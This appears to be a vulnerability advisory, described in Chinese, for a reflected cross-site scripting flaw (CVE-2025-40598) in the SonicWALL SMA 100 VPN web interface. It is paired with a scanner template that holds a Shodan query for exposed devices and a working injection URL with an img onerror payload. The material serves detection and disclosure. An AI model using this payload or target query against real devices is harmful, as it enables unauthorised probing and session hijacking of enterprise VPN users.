SonicWALL SMA 100 Web Interface Cross Site Scripting Vulnerability
漏洞信息
漏洞名称: SonicWALL SMA 100 Web Interface Cross Site Scripting Vulnerability
漏洞编号:
CVE: CVE-2025-40598
漏洞类型: 跨站可执行脚本
漏洞等级: 中危
漏洞描述: SonicWALL SMA 100系列是一款广泛使用的SSL VPN设备,为企业提供安全的远程访问解决方案。该设备的web界面存在一个反射型跨站脚本(XSS)漏洞,允许远程未认证攻击者潜在执行任意JavaScript代码。此漏洞的根源在于web界面未能正确过滤用户输入,特别是在处理radiusChallengeLogin页面的portalName和status参数时,攻击者可以通过构造特定的URL,注入恶意脚本。当其他用户访问这个恶意链接时,注入的脚本会在用户的浏览器中执行,可能导致会话劫持、敏感信息泄露或其他恶意操作。由于攻击者需要诱导用户点击特制链接,且漏洞利用需要用户交互,因此被评级为中危。尽管如此,考虑到SonicWALL SMA 100系列在企业环境中的广泛部署,此漏洞的安全风险不容忽视。
info: name: SonicWALL SMA 100- Web Interface Cross Site Scripting author: watchtowr,DhiyaneshDK severity: medium description: | A Reflected cross-site scripting (XSS) vulnerability exists in the SMA100 series web interface, allowing a remote unauthenticated attacker to potentially execute arbitrary JavaScript code. reference: - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0012 - https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/ metadata: max-request:1 shodan-query: product:"SonicWALL SSL VPN http proxy" tags: cve,cve2025,xss,cgi-bin,sonicwall,sma100,sslvpn
http: -method: GET path: -"{{BaseURL}}/cgi-bin/radiusChallengeLogin?portalName=portal1&status=needchallenge&state=\"><img/src=x+onerror=alert`1`>"
matchers: -type: word part: body words: - '"><img/src=x+onerror=alert`1`>'